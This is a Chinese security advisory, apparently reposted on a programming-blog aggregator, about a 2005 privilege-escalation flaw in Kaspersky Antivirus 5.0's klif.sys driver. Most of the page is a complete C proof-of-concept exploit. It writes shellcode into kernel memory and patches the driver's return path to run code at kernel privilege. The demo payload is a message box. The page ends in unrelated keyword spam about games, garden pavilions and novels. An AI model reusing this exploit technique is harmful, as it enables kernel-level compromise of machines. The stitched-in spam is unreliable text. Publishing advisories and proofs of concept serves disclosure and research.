程序博客网 > 剑三妖艳成女捏脸数据

Kaspersky杀毒软件klif.sys权限提升漏洞

来源:互联网 发布:剑三妖艳成女捏脸数据 编辑:程序博客网 时间:2024/05/17 23:38

发布日期:2005-06-08
更新日期:2005-06-08

受影响系统:
Kaspersky Labs Kaspersky Antivirus 5.0.335
Kaspersky Labs Kaspersky Antivirus 5.0.228
Kaspersky Labs Kaspersky Antivirus 5.0.227描述:

BUGTRAQ  ID: 13878

Kaspersky是一款非常流行的杀毒软件。

Microsoft Windows 2000平台的Kaspersky软件设计上存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。

起因是Kaspersky内核驱动klif.sys没有正确丢弃高权限,攻击者可能利用这个漏洞以系统内核的权限执行任意代码。

<*来源:Ilya Rabinovich (info@softsphere.com
 
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2
*>

测试方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

//(C) by Ilya Rabinovich.

#include <windows.h>

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;

PDWORD pJmpAddress=(PDWORD)0xBE9372B0;

PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};

PUCHAR pKAVRet;


unsigned char code[]={0x68,0x00,0x02,0x00,0x00,    //push 0x200
                    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address> - 0xBE938000
                    0x6A,0x00,                    //push 0 
                    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<GetModuleFileNameA> -> +13
                    0xFF,0xD0,                    //call eax
                    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address>
                    0x68,0x00,0x82,0x93,0xBE,    //push <address of the notepad path>- 0xBE938200
                    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<lstrcmpiA> -> +30
                    0xFF,0xD0,                    //call eax
                    0x85,0xC0,                    //test eax,eax
                    0x74,0x03,                    //je +03
                    0xC2,0x04,0x00,                //retn 4
                    0x6A,0x00,                    //push 0
                    0x68,0x00,0x84,0x93,0xBE,    //push <address of the message string>- 0xBE938400
                    0x68,0x00,0x84,0x93,0xBE,    //push <address of the message string>- 0xBE938400
                    0x6A,0x00,                    //push 0
                    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<MessageBoxA> -> +58
                    0xFF,0xD0,                    //call eax
                    0xC2,0x04,0x00                //retn 4
                    };

unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt /
[0xBE9372B0]

//////////////////////////////////////////////////////////////

BOOLEAN LoadExploitIntoKernelMemory(void){

 

//Get function's addresses

    HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
    HANDLE hUser=GetModuleHandle("USER32.DLL");

    FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
    FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");

    FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");

    *(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
    *(DWORD*)(code+30)=(DWORD)plstrcmpiA;
    *(DWORD*)(code+58)=(DWORD)pMessageBoxA;

//Prepare our data into ring0-zone.

    PCHAR pNotepadName=(PCHAR)0xBE938200;

    char temp_buffer[MAX_PATH];
    char *s;

    SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

    lstrcpy(pNotepadName,temp_buffer);

    PCHAR pMessage=(PCHAR)0xBE938400;

    lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");

    memmove(pCodeBase,code,sizeof(code));

    *pJmpAddress=(DWORD)pCodeBase;

    memmove(pKAVRet,jmp_code,sizeof(jmp_code));

    return TRUE;
}

///////////////////////////////////////////////////////////////

void UnloadExploitFromKernelMemory(){

    UCHAR retn_4[]={0xC2,0x04,0x00};

    memmove(pKAVRet,retn_4,sizeof(retn_4));

}

/////////////////////////////////////////////////////////////////

PUCHAR GetKAVRetAddress(void){

//Check the retn 4 in the KAV 0xBE9334E1 function end
//Also, we check the KAV klif.sys existance.

    UCHAR retn_4[]={0xC2,0x04,0x00};

    __try{

        for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){

            if(memcmp(pKAVRets,retn_4,sizeof(retn_4))==0)
                return pKAVRets;

        }

    }__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not /
installed",NULL,0);return NULL;}


    MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of /
KAV",NULL,0);  return NULL;
}

/////////////////////////////////////////////////////////////////

void main(void){

    pKAVRet=GetKAVRetAddress();

    if(NULL==pKAVRet)
        return;


    if(!LoadExploitIntoKernelMemory())
        return;

    char temp_buffer[MAX_PATH];
    char *s;

    SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

    PROCESS_INFORMATION pi;

    STARTUPINFO si={0};
    si.cb=sizeof(si);

    CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
                        0,NULL,NULL,&si,&pi);

    WaitForSingleObject(pi.hProcess,INFINITE);

    MessageBox(NULL,"Now you may start your own Notepad instance to check this /
exploit!","KAV_EXPLOITER",0);

    MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);

    UnloadExploitFromKernelMemory();
}

建议:

厂商补丁:

Kaspersky Labs
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.kaspersky.com/
剑三妖艳成女捏脸数据 剑三妖艳成女捏脸数据
原创粉丝点击
热门IT博客
没有经验淘宝美工面试没有经验淘宝美工面试
mac html编辑器mac html编辑器
程序员需要会什么
百度端口户的返点
illustrator cs5 mac
2016全国意外死亡数据
保修系统源码
hd graphics5500知乎
mac好用的作图软件
linux如何解压zip文件
淘客 知乎
sql 2008 创建视图语句
kuka机器人仿真软件
php print 换行
二手手机淘宝店推荐
求生之路2mac中文版
佳能手机打印软件
想找份网络兼职
fanuc示教器模拟软件
mac删除虚拟机后空间
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 木结构凉亭价格 防腐木凉亭价格 户外木制凉亭 户外碳化木凉亭 防腐木凉亭效果图 六角凉亭图片 四角凉亭制作 庭院凉亭价格 六角凉亭效果图 木质凉亭价格 欧式凉亭价格 六角凉亭施工图 木质凉亭图片 手工制作凉亭 防腐木六角凉亭图片 庭院凉亭图片 防腐木别墅凉亭 防腐木凉亭制作厂家 防腐木凉亭厂家批发 园林凉亭设计 防腐木双层凉亭 欧式凉亭图片 四角凉亭图片 防腐木阳台装修图 批发防腐木 山田凉介 三浦凉介 凉介 山本凉介 山田凉介承认被打 秦涵依纪凉睿 片寄凉太 柚子凉性还是热性 柚子凉性热性 片寄凉 沈娴秦如凉免费阅读 沈娴秦如凉 凉否作品 火龙果凉性 宫部凉花 子夜十颜凉雨

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里